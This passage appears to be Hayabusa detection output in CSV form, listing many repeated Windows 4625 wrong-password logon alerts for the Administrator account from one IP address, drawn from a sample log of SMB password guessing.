NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 